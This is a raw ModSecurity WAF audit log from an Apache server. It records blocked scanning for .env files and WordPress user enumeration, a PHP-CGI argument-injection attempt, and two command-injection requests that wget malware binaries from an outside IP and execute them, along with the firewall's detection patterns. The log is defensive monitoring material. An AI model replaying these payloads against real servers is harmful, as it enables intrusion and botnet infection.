ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749507290890216 750 (- - -) Stopwatch2: 1749507290890216 750; combined=259, p1=226, p2=0, p3=0, p4=0, p5=32, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e17b57b-Z-- --4db21067-A-- [10/Jun/2025:05:44:08 +0700] aEdjuJSz29O8wd7wtMvHlgAAAJY 103.236.140.4 58708 103.236.140.4 8181 --4db21067-B-- GET /www/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 Accept-Charset: utf-8 --4db21067-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4db21067-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749509048854909 832 (- - -) Stopwatch2: 1749509048854909 832; combined=321, p1=271, p2=0, p3=0, p4=0, p5=49, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4db21067-Z-- --247fcd2a-A-- [10/Jun/2025:05:54:21 +0700] aEdmHZSz29O8wd7wtMvHoQAAAJA 103.236.140.4 58794 103.236.140.4 8181 --247fcd2a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 Accept-Charset: utf-8 --247fcd2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --247fcd2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749509661840773 881 (- - -) Stopwatch2: 1749509661840773 881; combined=341, p1=299, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --247fcd2a-Z-- --223d721f-A-- [10/Jun/2025:06:19:43 +0700] aEdsDzQZgo88hy0TiYz3yQAAAFM 103.236.140.4 59044 103.236.140.4 8181 --223d721f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 15.235.143.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 15.235.143.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --223d721f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --223d721f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749511183678897 3585 (- - -) Stopwatch2: 1749511183678897 3585; combined=1613, p1=549, p2=1023, p3=0, p4=0, p5=41, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --223d721f-Z-- --68b15b5f-A-- [10/Jun/2025:06:34:47 +0700] aEdvl2QJEkWdvAT5oU6fbgAAAA0 103.236.140.4 59162 103.236.140.4 8181 --68b15b5f-B-- GET /src/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; KIICAA POWER) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --68b15b5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68b15b5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749512087792879 870 (- - -) Stopwatch2: 1749512087792879 870; combined=341, p1=300, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68b15b5f-Z-- --6e804d46-A-- [10/Jun/2025:06:55:06 +0700] aEd0WjQZgo88hy0TiYz38QAAAEs 103.236.140.4 59330 103.236.140.4 8181 --6e804d46-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 120.48.45.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 120.48.45.123 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --6e804d46-C-- --6e804d46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e804d46-E-- --6e804d46-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749513306870366 5447 (- - -) Stopwatch2: 1749513306870366 5447; combined=3289, p1=514, p2=2724, p3=0, p4=0, p5=50, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e804d46-Z-- --b5f38713-A-- [10/Jun/2025:07:18:37 +0700] aEd53ZSz29O8wd7wtMvHwwAAAIY 103.236.140.4 59572 103.236.140.4 8181 --b5f38713-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.66.56.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.66.56.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b5f38713-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5f38713-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749514717922020 2847 (- - -) Stopwatch2: 1749514717922020 2847; combined=1239, p1=424, p2=787, p3=0, p4=0, p5=28, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5f38713-Z-- --361dc34b-A-- [10/Jun/2025:07:48:00 +0700] aEeAwDQZgo88hy0TiYz4TwAAAFQ 103.236.140.4 59794 103.236.140.4 8181 --361dc34b-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/x86;chmod+777+*;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm7;chmod+777+*;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm4;chmod+777+*;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm5;chmod+777+*;./arm5+arm5 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --361dc34b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --361dc34b-E-- --361dc34b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/x86;chmod 777 *;./x86 x86;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm7;chmod 777 *;./arm7 arm7;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm4;chmod 777 *;./arm4 arm4;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm5;chmod 777 *;./arm5 arm5: cd/tmp rm -rf j nohup wget http://94.26.90.251/x86 chmod 777 * ./x86 x86 cd/tmp rm -rf j nohup wget http://94.26.90.251/arm7 chmo..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749516480912786 2914 (- - -) Stopwatch2: 1749516480912786 2914; combined=893, p1=517, p2=334, p3=0, p4=0, p5=41, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --361dc34b-Z-- --f0267b10-A-- [10/Jun/2025:08:15:32 +0700] aEeHNGQJEkWdvAT5oU6g6AAAAAI 103.236.140.4 38006 103.236.140.4 8181 --f0267b10-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 172.102.125.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 172.102.125.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f0267b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0267b10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749518132151914 2800 (- - -) Stopwatch2: 1749518132151914 2800; combined=1272, p1=434, p2=809, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0267b10-Z-- --16083163-A-- [10/Jun/2025:08:15:44 +0700] aEeHQGkffiosQXBbxVZTZgAAANA 103.236.140.4 38012 103.236.140.4 8181 --16083163-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.68.195.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.68.195.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --16083163-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16083163-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749518144201674 3258 (- - -) Stopwatch2: 1749518144201674 3258; combined=1430, p1=489, p2=910, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16083163-Z-- --eaaf4b29-A-- [10/Jun/2025:08:43:44 +0700] aEeN0DQZgo88hy0TiYz6JgAAAEA 103.236.140.4 38178 103.236.140.4 8181 --eaaf4b29-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.11.83.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.11.83.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eaaf4b29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaaf4b29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749519824192320 2349 (- - -) Stopwatch2: 1749519824192320 2349; combined=1033, p1=334, p2=673, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaaf4b29-Z-- --fc2be40e-A-- [10/Jun/2025:09:15:37 +0700] aEeVSWQJEkWdvAT5oU6hNQAAABg 103.236.140.4 38652 103.236.140.4 8181 --fc2be40e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.100.216.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.100.216.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fc2be40e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc2be40e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749521737453456 3351 (- - -) Stopwatch2: 1749521737453456 3351; combined=1466, p1=484, p2=951, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc2be40e-Z-- --63d7c770-A-- [10/Jun/2025:09:21:59 +0700] aEeWx5Sz29O8wd7wtMvJUgAAAJQ 103.236.140.4 38698 103.236.140.4 8181 --63d7c770-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.65.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.65.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --63d7c770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63d7c770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749522119940809 860 (- - -) Stopwatch2: 1749522119940809 860; combined=335, p1=294, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63d7c770-Z-- --4e118468-A-- [10/Jun/2025:10:51:34 +0700] aEerxmkffiosQXBbxVZTtwAAANQ 103.236.140.4 39368 103.236.140.4 8181 --4e118468-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.180.42.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.180.42.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e118468-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e118468-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749527494814739 2800 (- - -) Stopwatch2: 1749527494814739 2800; combined=1188, p1=392, p2=769, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e118468-Z-- --9f0ffa62-A-- [10/Jun/2025:11:28:40 +0700] aEe0eJSz29O8wd7wtMvKAQAAAIE 103.236.140.4 40036 103.236.140.4 8181 --9f0ffa62-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.188.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.188.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9f0ffa62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f0ffa62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749529720358499 2925 (- - -) Stopwatch2: 1749529720358499 2925; combined=1306, p1=427, p2=849, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f0ffa62-Z-- --f12ceb41-A-- [10/Jun/2025:11:29:39 +0700] aEe0s5Sz29O8wd7wtMvKBgAAAJA 103.236.140.4 40054 103.236.140.4 8181 --f12ceb41-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/x86;chmod+777+*;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm7;chmod+777+*;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm4;chmod+777+*;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm5;chmod+777+*;./arm5+arm5 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --f12ceb41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f12ceb41-E-- --f12ceb41-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/x86;chmod 777 *;./x86 x86;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm7;chmod 777 *;./arm7 arm7;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm4;chmod 777 *;./arm4 arm4;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm5;chmod 777 *;./arm5 arm5: cd/tmp rm -rf j nohup wget http://94.26.90.251/x86 chmod 777 * ./x86 x86 cd/tmp rm -rf j nohup wget http://94.26.90.251/arm7 chmo..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749529779304582 2619 (- - -) Stopwatch2: 1749529779304582 2619; combined=844, p1=496, p2=313, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f12ceb41-Z-- --09cca70c-A-- [10/Jun/2025:11:58:47 +0700] aEe7h2QJEkWdvAT5oU6hmAAAABY 103.236.140.4 40346 103.236.140.4 8181 --09cca70c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.53.21.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.53.21.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 